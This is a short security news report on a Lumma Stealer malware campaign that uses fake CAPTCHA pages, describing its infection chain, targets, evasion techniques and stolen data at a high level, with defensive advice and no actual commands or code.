A sophisticated malware campaign leveraging fake CAPTCHA verification pages has been discovered, targeting industries worldwide with the Lumma Stealer information-stealing malware. The campaign, active since late 2024, continues to evolve with new tactics and broader targets.
Attack Methodology
The infection chain employs a deceptive process to trick users into executing malicious code:
- Compromised Websites: Victims visit a hacked or malicious website.
- Fake CAPTCHA Pages: Users are redirected to a CAPTCHA page instructing them to copy-paste a command into the Windows Run prompt.
- Execution of Malicious Command: The command, using mshta.exe, downloads and executes an HTA file.
- Payload Delivery: The HTA file triggers multiple PowerShell scripts to load the Lumma Stealer malware.
Target Scope and Impact
The campaign has targeted organizations across multiple sectors:
- Industries: Telecommunications (most targeted), healthcare, banking, and marketing.
- Countries: Victims have been identified in Argentina, Colombia, the United States, the Philippines, and beyond.
Technical Advancements
The Lumma Stealer campaign uses sophisticated techniques to bypass defenses and enhance its delivery:
- Antimalware Evasion: Bypasses Windows Antimalware Scan Interface (AMSI).
- Execution Context: Operates outside browser environments, avoiding browser-based security controls.
- Malware-as-a-Service (MaaS): Distributed via a MaaS model, complicating detection and response efforts.
- Expanded Distribution: Includes nearly 1,000 counterfeit domains impersonating services like Reddit and WeTransfer.
- Encryption and Obfuscation: Uses the ChaCha20 cipher for configuration decryption and password-protected archives to evade detection.
Data Targeted
The malware focuses on stealing high-value user data, including:
- Passwords stored in browsers.
- Cryptocurrency wallet credentials.
- Credit card information.
- Two-factor authentication (2FA) tokens.
Recent Developments
The campaign has shown adaptability, incorporating new tools and methods:
- Fake Domains: Nearly 1,000 fake websites redirect users to malware-laden files.
- SelfAU3 Dropper: A custom AutoIT dropper to execute Lumma.
- Integration with Amadey Trojan: Leveraging multiple malware strains for enhanced functionality.
Broader Implications
The campaign underscores a growing trend of sophisticated social engineering and Malware-as-a-Service distribution. Recent tactics include mimicking legitimate services like Reddit, WeTransfer, and Gravatar to increase credibility and trick users into executing malicious commands.
This global campaign highlights the importance of user awareness and robust endpoint protection. Organizations are advised to implement strict access controls, train employees to recognize phishing attempts, and deploy advanced threat detection tools to mitigate risks.
